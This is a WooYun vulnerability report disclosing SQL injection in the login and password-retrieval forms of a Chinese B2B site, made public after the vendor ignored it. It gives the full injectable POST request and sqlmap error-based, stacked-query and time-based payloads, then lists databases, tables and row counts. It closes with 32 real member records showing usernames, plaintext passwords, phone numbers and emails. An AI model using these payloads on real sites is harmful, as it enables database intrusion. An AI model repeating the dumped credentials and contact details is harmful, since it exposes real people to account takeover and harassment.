当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150404

漏洞标题:中国商业港多处sql注入可导致395万会员信息泄漏(影响大量企业)

相关厂商:中国商业港

漏洞作者: 撸撸侠

提交时间:2015-10-29 17:15

修复时间:2015-12-13 17:16

公开时间:2015-12-13 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国商业港多处sql注入可导致395万会员信息泄漏(影响大量企业)

详细说明:

http://www.eb80.com.cn/retrieve.aspx
http://www.eb80.com.cn/login.aspx
登陆用户名和密码都存在注入

POST /retrieve.aspx HTTP/1.1
Host: www.eb80.com.cn
Proxy-Connection: keep-alive
Content-Length: 258
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.eb80.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.eb80.com.cn/retrieve.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: baidu=url=https://www.baidu.com/link?url=NruWSHx6qapsBW8OUE-sd385TXJT2ftf0ip_wap6ZbxFI46wwh3BTaysIRg92oMT&wd=&eqid=e3597bae0000a299000000045631d950; CNZZDATA2189235=cnzz_eid%3D402168800-1445938092-null%26ntime%3D1446103279
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
__VIEWSTATE=%2FwEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR%2Bagkr%2FW03QmpbLnupc2%2BgHxUmc%3D&__EVENTVALIDATION=%2FwEWAwLXw6yLDQKpkq%2B%2BBQKM54rGBs%2BmqWbjv05jIBDG%2BHeMrqu%2FhnDpkRz%2BNN2Twh8l5flh&loginid=1234%40qq.com*&Button1=%C8%A1%BB%D8%C3%DC%C2%EB


参数loginid存在sql注入

漏洞证明:

Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&loginid=1234@qq.com' AND 4942=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4942=4942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'DnHl'='DnHl&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&loginid=1234@qq.com';WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&loginid=1234@qq.com' WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
---
[16:56:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[16:56:57] [INFO] fetching database names
[16:56:57] [INFO] the SQL query used returns 9 entries
[16:56:57] [INFO] resumed: EbBuy
[16:56:57] [INFO] resumed: master
[16:56:57] [INFO] resumed: model
[16:56:57] [INFO] resumed: msdb
[16:56:57] [INFO] resumed: new21tex
[16:56:57] [INFO] resumed: ReportServer
[16:56:57] [INFO] resumed: ReportServerTempDB
[16:56:57] [INFO] resumed: tempdb
[16:56:57] [INFO] resumed: zlceshi
available databases [9]:
[*] EbBuy
[*] master
[*] model
[*] msdb
[*] new21tex
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zlceshi


Database: new21tex
[46 tables]
+--------------+
| BuyOne |
| Cert |
| GoldenChange |
| KeyList |
| MoneyList |
| News |
| Pro_cate |
| Report |
| SeeBuy |
| UpdateMoney |
| admin |
| appraisal |
| area |
| bbs |
| bbscate |
| bbsreport |
| buy |
| buylink |
| buyold |
| cate |
| cateinfo |
| client |
| delmember |
| dtproperties |
| favorite |
| friend |
| friendlyLink |
| hangzhou |
| info |
| info_cate |
| info_manage |
| info_report |
| job |
| keywords |
| link |
| member |
| mystore |
| newcate |
| pm |
| poll |
| question |
| remark |
| sale |
| toupiao |
| zymjisuande |
| zymjisuande2 |
+--------------+


Database: new21tex
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.member | 3953424 |
| dbo.buylink | 1130709 |
| dbo.buyold | 774857 |
| dbo.buy | 375335 |
| dbo.BuyOne | 212201 |
| dbo.Pro_cate | 138593 |
| dbo.cateinfo | 60941 |
| dbo.sale | 40717 |


列举几条数据证明:

Database: new21tex
Table: member
[32 entries]
+----------------+-----------------+-------------+-------------------+
| loginid | password | mobile | email |
+----------------+-----------------+-------------+-------------------+
| hdsm | 232518 | 15888578621 | _198@163.com |
| chunhu888 | 82750082 | 13735051668 | 03083439@163.com |
| my0397 | 3935555 | 13033788602 | 0397@163.com |
| kamada0421 | kamada123456 | 13929413635 | 06@sohu.com |
| wei10021230 | 123123 | 18639195144 | 10021230@163.com |
| futianjian | a5682563 | 18473056208 | 1002124942@qq.com |
| sdxx | sdxx159 | 13388866666 | 1003623382@qq.com |
| nss607 | nss607nss607 | 13602885625 | 1004863080@qq.com |
| ykzdhsb | 553231 | 13994227979 | 1004902797@qq.com |
| xinglong | 518520 | 18028118004 | 1005024218@qq.com |
| fzcs | wyy197828 | 13806479595 | 1006358181@qq.com |
| akr123 | akr1234 | 15098944980 | 1006542843@qq.com |
| dgy2 | 03557180443 | 15383440960 | 1006683207@qq.com |
| ylgs | lwogw | 13533861288 | 1006817999@qq.com |
| wangruifa1989 | 1989520mix | 13510005605 | 1008519@qq.com |
| jhfmzziwo | jianhuavalve | 18605366676 | 1009870114@qq.com |
| zzcinline | zzcinline | 15300365668 | 1009904795@qq.com |
| rst761224 | rst761224123 | 15011876851 | 1010487410@qq.com |
| wxtmm123 | tianmimi123 | 15261560098 | 1010516786@qq.com |
| bjdpwg | 19656634jdww | 13391838980 | 1010726329@qq.com |
| beiya321 | sybywdblj | 13940406166 | 1010743532@qq.com |
| xinsenkuangye | 15027773012 | 15027773012 | 1011187819@qq.com |
| sindy0418 | tangyanfei1984 | 13815177971 | 1013643489@qq.com |
| zzltyl | zhengzhouletong | 13393719244 | 1014316628@qq.com |
| shu8615100 | 4502558 | 15337169306 | 1016856651@qq.com |
| wmf13608847120 | wmf3310057510 | 13759511960 | 1017264166@qq.com |
| zhengmei123 | HAIYANG520 | 18855183912 | 1019508988@QQ.com |
| a546620 | a546620 | 13929498483 | 1019797683@qq.com |
| huamei226 | 890226105 | 15690388969 | 1020888218@qq.com |
| hl87935548 | a168168 | 13829175103 | 1020984905@qq.com |
| ji1021055299 | jiyuanjin | 13952089461 | 1021055299@qq.com |
| cqdudu | abcabc000 | 18523369997 | 1021267816@qq.com |
+----------------+-----------------+-------------+-------------------+

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)